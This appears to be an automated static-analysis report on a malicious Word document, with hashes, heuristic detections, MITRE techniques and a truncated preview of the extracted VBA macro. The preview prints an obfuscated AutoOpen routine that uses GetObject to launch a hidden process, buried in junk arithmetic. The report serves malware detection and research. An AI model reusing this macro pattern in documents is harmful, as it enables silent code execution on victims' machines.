Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 84811d076fae0f57…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 145.1 KB
Created: 2019-03-20 14:48:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: 493218e18b2dcd84568ee95f97e4e2cf
SHA-1: 76af3662e8aa23c3e21d64091f73b6407a7dffa7
SHA-256: 84811d076fae0f573eb91d0c8aa792dae2aeb6a5e6f0f989296e7bc97da67ab0
Risk score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The 'autoopen' subroutine is present and uses a GetObject call, a technique commonly used to download and execute secondary payloads. The ClamAV detection name 'Doc.Malware.Sagent-6902893-0' further confirms its malicious nature. The VBA code is obfuscated, which prevents a more detailed analysis of the payload's specific actions.

Heuristics (7)

  • ClamAV: Doc.Malware.Sagent-6902893-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Malware.Sagent-6902893-0
  • VBA macros detected [medium, 3 related findings, OLE_VBA_MACROS]
    Document contains VBA macro code
  • AutoOpen macro [high, OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • GetObject call [high, OLE_VBA_GETOBJ]
    GetObject call
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 16486 bytes
SHA-256: 85e3a87222971c779d6dad3069d14b7682c83b939c30dd4e904e7a41fead598b

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "GQDAA4A"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "mGwAGQD"
Attribute VB_Base = "0{A3231994-0405-462A-A1C2-8FF3BF66FF47}{A302F022-DC64-47CA-B2F5-9FDFF06F53D7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "hAAZAA"
Sub autoopen()
On Error Resume Next
   If mAAAcA = oCABAxA Then
      lAQA_AA = 360460939 * CInt(616932250) / _
493785898 + Sqr(458583148) * 728298510 / CInt(931328294) * (650238058 * 551928430)
      kcDZ4UQ = (93967997 - Asc(wQAcBB) / BABAD1A / 367112517 + _
hB1Zk41A / Fix(657703886 + Log(FAABBX * Sgn(583937233) + toUAZUD / CSng(427730617))))
End If
   If OwAAGD4_ = pAADBB Then
      VAUDABAk = 712164150 * CInt(678201983) / _
403439880 + Sqr(608737942) * 346981986 / CInt(887036070) * (31494867 * 189248671)
      BDZGDAxB = (51313011 - Asc(SxxAAB) / vAAUBA / 938327368 + _
oAQADo / Fix(547418284 + Log(mAAAAQ * Sgn(602746105) + jDoA1_A / CSng(108804646))))
End If
   If loZ1AQ = nxXQBkAA Then
      rwXCUQ = 959896255 * CInt(130090308) / _
129873245 + Sqr(724149820) * 455445265 / CInt(707421804) * (458249446 * 249045504)
      zU_1AB = (890124428 - Asc(cUUoDD4) / JACQXUD / 790973879 + _
ZABCcGkQ / Fix(714023240 + Log(AAQDAD * Sgn(258489203) + SBkxAAAw / CSng(526080821))))
End If
Set v_BGcG = GetObject(mGwAGQD.RGAADA)
   If jBxAoCUD = c4AAoDZX Then
      qkADAAwA = 135865924 * CInt(496703309) / _
59940355 + Sqr(979082682) * 820981873 / CInt(149309126) * (563785917 * 364391530)
      HDBoDDQ = (607898886 - Asc(WA1BXG) / MCAAU1C / 725977624 + _
okwZwBA / Fix(429506819 + Log(Cc1kAAxA * Sgn(194570980) + HcAko1oG / CSng(290826635))))
End If
   If jAooQAA = T4AA4B Then
      ZDAUUAx = 8602144 * CInt(576647515) / _
85589341 + Sqr(516300873) * 879881470 / CInt(857882346) * (196164702 * 789476055)
      KAAAAXAx = (13419597 - Asc(wQwAQ1) / NBA4BowA / 289888408 + _
JAAAUko / Fix(904064640 + Log(QGU_ADAo * Sgn(871851531) + wDAc1kB / CSng(773913630))))
End If
   If jQQwoA = LQxBAQB Then
      oAQAU4QD = 443932658 * CInt(795783673) / _
756604422 + Sqr(927126228) * 716537682 / CInt(886780290) * (972002796 * 653697702)
      RQQBQxX = (523253843 - Asc(iXo_AAxw) / MAxk_A / 244604452 + _
tAAAAwG / Fix(312501987 + Log(mAoQUA * Sgn(253004511) + GABAcA / CSng(128409972))))
End If
v_BGcG.ShowWindow = 77530 - 77530
   If jAAoAx = lAA1AXGA Then
      OBkACAX = 269266117 * CInt(715040411) / _
842971776 + Sqr(751485346) * 212281959 / CInt(754140829) * (533957089 * 796873008)
      aAXA_UxA = (137014469 - Asc(KQAZAA) / KDwAGQ / 318548519 + _
aAQZQA / Fix(152383850 + Log(zAAkcA1 * Sgn(201328988) + FwQCAB / CSng(317166610))))
End If
   If u1AAcA = nBB_UA Then
      k4UAABAQ = 85219461 * CInt(204448542) / _
239211574 + Sqr(390941598) * 839005007 / CInt(74740253) * (911348423 * 418700860)
      zAcGGADX = (77693527 - Asc(vQA1DA) / UCAB1A / 795536785 + _
JGAAZUQ / Fix(117999692 + Log(z__cZA * Sgn(651591479) + WDQAD1B / CSng(738625387))))
End If
   If pXUXABkQ = pDGXcw4 Then
      SZQAcAGB = 459707733 * CInt(94268094) / _
280763892 + Sqr(556862412) * 850561241 / CInt(699526922) * (262996421 * 234784759)
      QAkxDC = (420550504 - Asc(coxAADk) / OQAoUc / 666531387 + _
vCGACAA / Fix(272745002 + Log(RABxDAkc * Sgn(446761763) + XUQxCA / CSng(453161763))))
End If
GetObject(mGwAGQD.Gcw1A_AC). _
Create# RoAoxUAC + mGwAGQD.B4QAXA + BXAU4GCc + mGwAGQD.GZAAAA + jAkAUAA + mGwAGQD.JBQAoABG + wckQkUDx, EQUQAUAZ, v_BGcG, hAAAXDAA
   If sABo4Q = dC4UD1A Then
      cBAGAAAk = 232633544 * CInt(118776403) / _
506359801 + Sqr(108038854) * 715836710 / CInt(151988754) * (880926149 * 381311283)
      f1Ax1BAA = (288996547 - Asc(tQA4UAo) / qkAADGo / 460044872 + _
lAB_wDUQ / F
... (truncated)